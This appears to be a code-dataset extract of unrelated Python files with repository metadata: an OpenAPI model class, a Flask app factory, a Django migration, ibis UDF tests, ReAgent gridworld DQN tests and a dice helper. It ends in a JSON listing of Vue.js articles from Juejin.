"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WaasNetworkControls):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, WaasNetworkControls):
return True
return self.to_dict() != other.to_dict()
| [
"aakatev@virtru.com"
] | aakatev@virtru.com |
b174000a9efc0a2cfcad23ba2a171ed686f20bdf | 97d34d62e4232e754c5f1a458b2d4068abadc1ab | /flask/flasky-master/app/__init__.py | 8438b924c8c21163e6af7b40d38c746c9ee4c1de | [
"MIT"
] | permissive | chenzhenpin/py_test | d0e4ae32ab43fae4da53d0f0ac7d89b77b041a96 | b05ed73210ab7ebdaa39d8ebcf9687d4ef16125c | refs/heads/master | 2022-12-27T10:21:54.114869 | 2018-12-06T02:04:31 | 2018-12-06T02:04:31 | 159,364,911 | 0 | 1 | null | 2022-12-15T14:30:38 | 2018-11-27T16:22:28 | Python | UTF-8 | Python | false | false | 1,256 | py | from flask import Flask
from flask_bootstrap import Bootstrap
from flask_mail import Mail
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
from config import config
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
pagedown.init_app(app)
if not app.debug and not app.testing and not app.config['SSL_DISABLE']:
from flask_sslify import SSLify
sslify = SSLify(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
from .api_1_0 import api as api_1_0_blueprint
app.register_blueprint(api_1_0_blueprint, url_prefix='/api/v1.0')
return app
| [
"1595347682@qq.com"
] | 1595347682@qq.com |
ffd5af4e55a9c62b4108a72d9b8dd7da83f80184 | 5a9c11b0d7d9d1ef11c8404c2e38cf2f5c4c6744 | /myapp/migrations/0002_delete_test.py | 41afe6a17802a63e3ce82c28b340021dfa556f12 | [] | no_license | tlaboni-ecl/Demo_project | 7c671498c8f0f65520552c884b274cbbd2aea47c | 9ed5427d504e830df65ec1e8b17f218feb92ad83 | refs/heads/main | 2022-12-20T17:08:58.545689 | 2020-10-17T20:19:52 | 2020-10-17T20:19:52 | 304,962,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | # Generated by Django 2.1.5 on 2020-10-17 06:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0001_initial'),
]
operations = [
migrations.DeleteModel(
name='test',
),
]
| [
"you@domain.com"
] | you@domain.com |
cc9fc4571d0de756eca3429627552998a832d55c | 2ce71cf8b2ab41b5ad26dbcb9b6cc5b8d27e632d | /ibis/pandas/tests/test_udf.py | 9a580c7e8331f1e32dc2db56ba648e0e41c4e422 | [
"Apache-2.0"
] | permissive | brandonwillard/ibis | 6f1341687df7bb15db7c655f0c7697efeb86357e | 93cc4ba8703a96e19660255e6e48e66d7cd69b31 | refs/heads/master | 2020-03-13T17:08:48.066938 | 2018-04-25T20:09:34 | 2018-04-25T20:09:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | import pytest
import numpy as np
import pandas as pd
import pandas.util.testing as tm
import ibis
import ibis.expr.types as ir
import ibis.expr.datatypes as dt
from ibis.pandas.udf import udf, udaf, nullable
from ibis.pandas.dispatch import pause_ordering
with pause_ordering():
@udf(input_type=[dt.string], output_type=dt.int64)
def my_string_length(series, **kwargs):
return series.str.len() * 2
@udaf(input_type=[dt.string], output_type=dt.int64)
def my_string_length_sum(series, **kwargs):
return (series.str.len() * 2).sum()
@udaf(input_type=[dt.double, dt.double], output_type=dt.double)
def my_corr(lhs, rhs, **kwargs):
return lhs.corr(rhs)
@udf([dt.double], dt.double)
def add_one(x):
return x + 1.0
@udf([dt.double], dt.double)
def times_two(x, scope=None):
return x * 2.0
def test_udf():
df = pd.DataFrame({'a': list('abc')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = my_string_length(t.a)
assert isinstance(expr, ir.ColumnExpr)
result = expr.execute()
expected = t.a.execute().str.len().mul(2)
tm.assert_series_equal(result, expected)
def test_udaf():
df = pd.DataFrame({'a': list('cba')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = my_string_length_sum(t.a)
assert isinstance(expr, ir.ScalarExpr)
result = expr.execute()
expected = t.a.execute().str.len().mul(2).sum()
assert result == expected
def test_udaf_in_groupby():
df = pd.DataFrame({
'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'key': list('ddeefff')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = t.groupby(t.key).aggregate(my_corr=my_corr(t.a, t.b))
assert isinstance(expr, ir.TableExpr)
result = expr.execute().sort_values('key')
dfi = df.set_index('key')
expected = pd.DataFrame({
'key': list('def'),
'my_corr': [
dfi.loc[value, 'a'].corr(dfi.loc[value, 'b']) for value in 'def'
]
})
columns = ['key', 'my_corr']
tm.assert_frame_equal(result[columns], expected[columns])
def test_nullable():
t = ibis.table([('a', 'int64')])
assert nullable(t.a.type()) == (type(None),)
@pytest.mark.xfail(
raises=AssertionError, reason='Nullability is not propagated')
def test_nullable_non_nullable_field():
t = ibis.table([('a', dt.String(nullable=False))])
assert nullable(t.a.type()) == ()
def test_udaf_parameter_mismatch():
with pytest.raises(Exception):
@udaf(input_type=[dt.double], output_type=dt.double)
def my_corr(lhs, rhs, **kwargs):
pass
def test_udf_parameter_mismatch():
with pytest.raises(Exception):
@udf(input_type=[], output_type=dt.double)
def my_corr2(lhs, **kwargs):
return 1.0
def test_call_multiple_udfs():
df = pd.DataFrame({
'a': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'b': np.arange(4, dtype=float).tolist() + np.random.rand(3).tolist(),
'key': list('ddeefff')})
con = ibis.pandas.connect({'df': df})
t = con.table('df')
expr = times_two(add_one(t.a))
result = expr.execute()
expected = df.a.add(1.0).mul(2.0)
tm.assert_series_equal(expected, result)
| [
"cpcloud@gmail.com"
] | cpcloud@gmail.com |
9b22f1b8a901bd7097257f0ce01b711698201d5b | a6fa311aff9a99ad6a47e41fe34f3f12bb507007 | /reagent/test/gridworld/test_gridworld_pytorch.py | ee5afe6e37f0a158e0ef29191e97d2229a700519 | [
"BSD-3-Clause"
] | permissive | cts198859/ReAgent | 222e9dd4aeba455ad5faa9f6178a0e9793cb82fc | 20f3d333821bad364fd567cce97de51c44123484 | refs/heads/master | 2022-09-15T13:08:24.732208 | 2020-05-29T00:51:35 | 2020-05-29T00:54:45 | 267,776,326 | 0 | 0 | BSD-3-Clause | 2020-05-29T05:51:43 | 2020-05-29T05:51:43 | null | UTF-8 | Python | false | false | 15,477 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import os
import random
import tempfile
import unittest
import numpy as np
import reagent.models as models
import reagent.types as rlt
import torch
from reagent.parameters import (
DiscreteActionModelParameters,
NormalizationData,
RainbowDQNParameters,
RLParameters,
TrainingParameters,
)
from reagent.prediction.dqn_torch_predictor import DiscreteDqnTorchPredictor
from reagent.prediction.predictor_wrapper import (
DiscreteDqnPredictorWrapper,
DiscreteDqnWithPreprocessor,
)
from reagent.preprocessing.normalization import get_num_output_features
from reagent.preprocessing.preprocessor import Preprocessor
from reagent.test.gridworld.gridworld import Gridworld
from reagent.test.gridworld.gridworld_base import DISCOUNT, Samples
from reagent.test.gridworld.gridworld_evaluator import GridworldEvaluator
from reagent.test.gridworld.gridworld_test_base import GridworldTestBase
from reagent.torch_utils import export_module_to_buffer
from reagent.training.c51_trainer import C51Trainer, C51TrainerParameters
from reagent.training.dqn_trainer import DQNTrainer, DQNTrainerParameters
from reagent.training.qrdqn_trainer import QRDQNTrainer, QRDQNTrainerParameters
class TestGridworld(GridworldTestBase):
def setUp(self):
self.minibatch_size = 512
np.random.seed(0)
random.seed(0)
torch.manual_seed(0)
super().setUp()
def get_sarsa_parameters(
self, environment, reward_shape, dueling, categorical, quantile, clip_grad_norm
):
rl_parameters = RLParameters(
gamma=DISCOUNT,
target_update_rate=1.0,
maxq_learning=False,
reward_boost=reward_shape,
)
training_parameters = TrainingParameters(
layers=[-1, 128, -1] if dueling else [-1, -1],
activations=["relu", "relu"] if dueling else ["linear"],
minibatch_size=self.minibatch_size,
learning_rate=0.05,
optimizer="ADAM",
clip_grad_norm=clip_grad_norm,
)
return DiscreteActionModelParameters(
actions=environment.ACTIONS,
rl=rl_parameters,
training=training_parameters,
rainbow=RainbowDQNParameters(
double_q_learning=True,
dueling_architecture=dueling,
categorical=categorical,
quantile=quantile,
num_atoms=5,
),
)
def get_modular_sarsa_trainer(
self,
environment,
dueling,
categorical,
quantile,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
return self.get_modular_sarsa_trainer_reward_boost(
environment,
{},
dueling=dueling,
categorical=categorical,
quantile=quantile,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
clip_grad_norm=clip_grad_norm,
)
def get_modular_sarsa_trainer_reward_boost(
self,
environment,
reward_shape,
dueling,
categorical,
quantile,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
assert not quantile or not categorical
parameters = self.get_sarsa_parameters(
environment, reward_shape, dueling, categorical, quantile, clip_grad_norm
)
state_normalization_parameters = environment.normalization
def make_dueling_dqn(num_atoms=None):
return models.DuelingQNetwork.make_fully_connected(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
layers=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
num_atoms=num_atoms,
)
if quantile:
if dueling:
q_network = make_dueling_dqn(num_atoms=parameters.rainbow.num_atoms)
else:
q_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
num_atoms=parameters.rainbow.num_atoms,
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
elif categorical:
assert not dueling
distributional_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
num_atoms=parameters.rainbow.num_atoms,
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
q_network = models.CategoricalDQN(
distributional_network,
qmin=-100,
qmax=200,
num_atoms=parameters.rainbow.num_atoms,
)
else:
if dueling:
q_network = make_dueling_dqn()
else:
q_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
q_network_cpe, q_network_cpe_target, reward_network = None, None, None
if parameters.evaluation and parameters.evaluation.calc_cpe_in_training:
q_network_cpe = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
q_network_cpe_target = q_network_cpe.get_target_network()
reward_network = models.FullyConnectedDQN(
state_dim=get_num_output_features(state_normalization_parameters),
action_dim=len(environment.ACTIONS),
sizes=parameters.training.layers[1:-1],
activations=parameters.training.activations[:-1],
)
if use_gpu:
q_network = q_network.cuda()
if parameters.evaluation.calc_cpe_in_training:
reward_network = reward_network.cuda()
q_network_cpe = q_network_cpe.cuda()
q_network_cpe_target = q_network_cpe_target.cuda()
if use_all_avail_gpus and not categorical:
q_network = q_network.get_distributed_data_parallel_model()
reward_network = reward_network.get_distributed_data_parallel_model()
q_network_cpe = q_network_cpe.get_distributed_data_parallel_model()
q_network_cpe_target = (
q_network_cpe_target.get_distributed_data_parallel_model()
)
if quantile:
parameters = QRDQNTrainerParameters.from_discrete_action_model_parameters(
parameters
)
trainer = QRDQNTrainer(
q_network,
q_network.get_target_network(),
parameters,
use_gpu,
reward_network=reward_network,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
)
elif categorical:
parameters = C51TrainerParameters.from_discrete_action_model_parameters(
parameters
)
trainer = C51Trainer(
q_network, q_network.get_target_network(), parameters, use_gpu
)
else:
parameters = DQNTrainerParameters.from_discrete_action_model_parameters(
parameters
)
trainer = DQNTrainer(
q_network,
q_network.get_target_network(),
reward_network,
parameters,
use_gpu,
q_network_cpe=q_network_cpe,
q_network_cpe_target=q_network_cpe_target,
)
return trainer
def get_trainer(
self,
environment,
reward_shape,
dueling,
categorical,
quantile,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
trainer = self.get_modular_sarsa_trainer_reward_boost(
environment,
reward_shape,
dueling=dueling,
categorical=categorical,
quantile=quantile,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
clip_grad_norm=clip_grad_norm,
)
return trainer
def get_predictor(self, trainer, environment):
state_normalization_parameters = environment.normalization
state_preprocessor = Preprocessor(state_normalization_parameters, False)
q_network = trainer.q_network
if isinstance(trainer, QRDQNTrainer):
class _Mean(torch.nn.Module):
def forward(self, input):
assert input.ndim == 3
return input.mean(dim=2)
q_network = models.Sequential(q_network, _Mean())
dqn_with_preprocessor = DiscreteDqnWithPreprocessor(
q_network.cpu_model().eval(), state_preprocessor
)
serving_module = DiscreteDqnPredictorWrapper(
dqn_with_preprocessor=dqn_with_preprocessor,
action_names=environment.ACTIONS,
)
predictor = DiscreteDqnTorchPredictor(serving_module)
return predictor
def _test_evaluator_ground_truth(
self,
dueling=False,
categorical=False,
quantile=False,
use_gpu=False,
use_all_avail_gpus=False,
clip_grad_norm=None,
):
environment = Gridworld()
evaluator = GridworldEvaluator(environment, False, DISCOUNT)
trainer = self.get_trainer(
environment,
{},
dueling=dueling,
categorical=categorical,
quantile=quantile,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
clip_grad_norm=clip_grad_norm,
)
self.evaluate_gridworld(environment, evaluator, trainer, use_gpu)
def test_evaluator_ground_truth_no_dueling_modular(self):
self._test_evaluator_ground_truth()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_no_dueling_gpu_modular(self):
self._test_evaluator_ground_truth(use_gpu=True)
def test_evaluator_ground_truth_dueling_modular(self):
self._test_evaluator_ground_truth(dueling=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_dueling_gpu_modular(self):
self._test_evaluator_ground_truth(dueling=True, use_gpu=True)
def test_evaluator_ground_truth_categorical_modular(self):
self._test_evaluator_ground_truth(categorical=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_categorical_gpu_modular(self):
self._test_evaluator_ground_truth(categorical=True, use_gpu=True)
def test_evaluator_ground_truth_quantile_modular(self):
self._test_evaluator_ground_truth(quantile=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_quantile_gpu_modular(self):
self._test_evaluator_ground_truth(quantile=True, use_gpu=True)
def test_evaluator_ground_truth_dueling_quantile_modular(self):
self._test_evaluator_ground_truth(dueling=True, quantile=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_evaluator_ground_truth_dueling_quantile_gpu_modular(self):
self._test_evaluator_ground_truth(dueling=True, quantile=True, use_gpu=True)
def _test_reward_boost(self, use_gpu=False, use_all_avail_gpus=False):
environment = Gridworld()
reward_boost = {"L": 100, "R": 200, "U": 300, "D": 400}
trainer = self.get_trainer(
environment,
reward_boost,
dueling=False,
categorical=False,
quantile=False,
use_gpu=use_gpu,
use_all_avail_gpus=use_all_avail_gpus,
)
evaluator = GridworldEvaluator(
env=environment, assume_optimal_policy=False, gamma=DISCOUNT
)
self.evaluate_gridworld(environment, evaluator, trainer, use_gpu)
def test_reward_boost_modular(self):
self._test_reward_boost()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_reward_boost_gpu_modular(self):
self._test_reward_boost(use_gpu=True)
def test_predictor_torch_export(self):
"""Verify that q-values before model export equal q-values after
model export. Meant to catch issues with export logic."""
environment = Gridworld()
samples = Samples(
mdp_ids=["0"],
sequence_numbers=[0],
sequence_number_ordinals=[1],
states=[{0: 1.0, 1: 1.0, 2: 1.0, 3: 1.0, 4: 1.0, 5: 1.0, 15: 1.0, 24: 1.0}],
actions=["D"],
action_probabilities=[0.5],
rewards=[0],
possible_actions=[["R", "D"]],
next_states=[{5: 1.0}],
next_actions=["U"],
terminals=[False],
possible_next_actions=[["R", "U", "D"]],
)
tdps = environment.preprocess_samples(samples, 1)
assert len(tdps) == 1, "Invalid number of data pages"
trainer = self.get_trainer(environment, {}, False, False, False)
input = rlt.FeatureData(tdps[0].states)
pre_export_q_values = trainer.q_network(input).detach().numpy()
state_normalization_parameters = environment.normalization
preprocessor = Preprocessor(state_normalization_parameters, False)
cpu_q_network = trainer.q_network.cpu_model()
cpu_q_network.eval()
dqn_with_preprocessor = DiscreteDqnWithPreprocessor(cpu_q_network, preprocessor)
serving_module = DiscreteDqnPredictorWrapper(
dqn_with_preprocessor, action_names=environment.ACTIONS
)
with tempfile.TemporaryDirectory() as tmpdirname:
buf = export_module_to_buffer(serving_module)
tmp_path = os.path.join(tmpdirname, "model")
with open(tmp_path, "wb") as f:
f.write(buf.getvalue())
f.close()
predictor = DiscreteDqnTorchPredictor(torch.jit.load(tmp_path))
post_export_q_values = predictor.predict([samples.states[0]])
for i, action in enumerate(environment.ACTIONS):
self.assertAlmostEqual(
float(pre_export_q_values[0][i]),
float(post_export_q_values[0][action]),
places=4,
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
5fad363ab88211dc685ce0fcd8f0c3dfbf84edfd | fb6e7922df3da2e9cdc37a00150d6d7663e907ff | /environment/rtfm/dynamics/dice.py | fbc50b78c60b350d2271d13d50dffc0476ae6757 | [
"Apache-2.0"
] | permissive | Spiph/GTG | c54a587002c42a032c89e8eceb5ec638f6c8c05f | 4a45032290d0c1364e4398684582c51094b245f5 | refs/heads/main | 2023-09-02T14:44:14.946624 | 2021-10-27T12:29:05 | 2021-10-27T12:29:05 | 393,086,007 | 0 | 0 | Apache-2.0 | 2021-08-05T15:09:07 | 2021-08-05T15:09:07 | null | UTF-8 | Python | false | false | 2,034 | py | # Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import random
class Dice:
def __init__(self):
pass
def roll(self):
raise NotImplementedError()
def describe(self):
raise NotImplementedError()
@classmethod
def from_str(cls, s):
dice = []
for sub in s.split('+'):
sub = sub.strip()
if 'd' not in sub:
constant = int(sub)
dice.append(ConstantDice(constant))
else:
splits = sub.split('d')
if len(splits) == 1:
num = 1
max_roll = splits[0]
elif len(splits) == 2:
num, max_roll = splits
if num == '':
num = 1
else:
raise Exception('could not parse dice string {} in main dice string {}'.format(sub, s))
dice.extend([SingleDice(max=int(max_roll)) for _ in range(int(num))])
return SumDice(dice) if len(dice) > 1 else dice[0]
class ConstantDice(Dice):
def __init__(self, constant):
super().__init__()
self.constant = self.max = constant
def roll(self):
return self.constant
def describe(self):
return repr(self.constant)
class SingleDice(Dice):
def __init__(self, max=20):
super().__init__()
self.max = max
def roll(self):
return random.randint(1, self.max)
def describe(self):
return 'd{}'.format(self.max)
class SumDice(Dice):
def __init__(self, subdice):
super().__init__()
self.sub = subdice
@property
def max(self):
return sum(d.max for d in self.sub)
def roll(self):
return sum(d.roll() for d in self.sub)
def describe(self):
return ' + '.join([d.describe() for d in self.sub])
| [
"jzyjiangzhengyao@gmail.com"
] | jzyjiangzhengyao@gmail.com |
499b4e1d8e1b2d32fea99ccda7428930a2633d1c | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/Vue.js/juejin_1689.py | b0dda920b43dd2ae496c60a944c794d487f62220 | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,153 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6882680744569733133", "article_info": {"article_id": "6882680744569733133", "user_id": "676954895026318", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue3 新特性浅析", "brief_content": "Vue鼓励我们将UI和UI的行为封装到组件中,通过嵌套组件来构建我们的App。但是存在这样的一种情景,有多个子组件从逻辑上看是属于同一个父组件的,但是从技术实现的角度来看,多个子组件可能应挂载在DOM的不同位置,比较常见的情景是Modal。在Vue3之前,我们可以参考下Elem…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1602499085", "mtime": "1602561678", "rtime": "1602561678", "draft_id": "6882659694356201485", "view_count": 3374, "collect_count": 4, "digg_count": 5, "comment_count": 0, "hot_index": 173, "is_hot": 0, "rank_index": 0.00143742, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "676954895026318", "user_name": "yangcrazy30", "company": "爱奇艺", "job_title": "前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/44ee17d1299ec0c7d3ee08b70e844440~300x300.image", "level": 2, "description": "", "followee_count": 26, "follower_count": 5, "post_article_count": 15, "digg_article_count": 28, "got_digg_count": 52, "got_view_count": 7424, "post_shortmsg_count": 0, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 126, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6882680744569733133, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6844903908398071816", "article_info": {"article_id": "6844903908398071816", "user_id": "114004940564951", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844903908398071816", "cover_image": "", "is_gfw": 0, "title": "Vue中mixins的使用方法和注意点", "brief_content": "vuex:用来做状态管理的,里面定义的变量在每个组件中均可以使用和修改,在任一组件中修改此变量的值之后,其他组件中此变量的值也会随之修改。 Mixins:可以定义共用的变量,在每个组件中使用,引入组件中之后,各个变量是相互独立的,值的修改在组件中不会相互影响。 组件:在父组件中…", "is_english": 0, "is_original": 1, "user_index": 4.7739092962143, "original_type": 0, "original_author": "", "content": "", "ctime": "1565228486", "mtime": "1598516927", "rtime": "1565283740", "draft_id": "6845076405676408839", "view_count": 9428, "collect_count": 31, "digg_count": 19, "comment_count": 10, "hot_index": 500, "is_hot": 0, "rank_index": 0.00143678, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "114004940564951", "user_name": "Mr_Ma", "company": "小米", "job_title": "高级前端开发工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/907e27569c653ee8d9890ce0718d5a0b~300x300.image", "level": 3, "description": "把握时间提升自己,提高自己的不可替代性!", "followee_count": 213, "follower_count": 325, "post_article_count": 53, "digg_article_count": 758, "got_digg_count": 707, "got_view_count": 171147, "post_shortmsg_count": 2, "digg_shortmsg_count": 16, "isfollowed": false, "favorable_author": 0, "power": 2418, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}], "user_interact": {"id": 6844903908398071816, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516042401021215214639004F2B"}, {"article_id": "6995068964887855118", "article_info": {"article_id": "6995068964887855118", "user_id": "3509296847914792", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809641218381709326], "visible_level": 0, "link_url": "", "cover_image": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1da35f7113374b0c8418f22a2e5e1aba~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "uniapp 腾讯地图", "brief_content": "uniapp是用vue.js开发所有前端应用的框架,开发人员只需要编写一套代码就可以发布到安卓、iOS、H5和小程序、快应用等平台。本篇文章讲的是uniapp中使用第三方地图的基础教学和案例分享", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628666476", "mtime": "1629285889", "rtime": "1628679458", "draft_id": "6995065856862453796", "view_count": 147, "collect_count": 0, "digg_count": 2, "comment_count": 0, "hot_index": 9, "is_hot": 0, "rank_index": 0.00143614, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3509296847914792", "user_name": "柒分熟", "company": "", "job_title": "", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/9/17/16d3e2325fcd9ed1~tplv-t2oaga2asx-image.image", "level": 2, "description": "", "followee_count": 1, "follower_count": 16, "post_article_count": 68, "digg_article_count": 160, "got_digg_count": 206, "got_view_count": 21976, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 432, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631692660, "id_type": 9, "tag_alias": "", "post_article_count": 31256, "concern_user_count": 313520}, {"id": 2547112, "tag_id": "6809641218381709326", "tag_name": "uni-app", "color": "", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/1562137782240a5ee2842b446e65c27a1c95dac40c00a.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1562108984, "mtime": 1631690466, 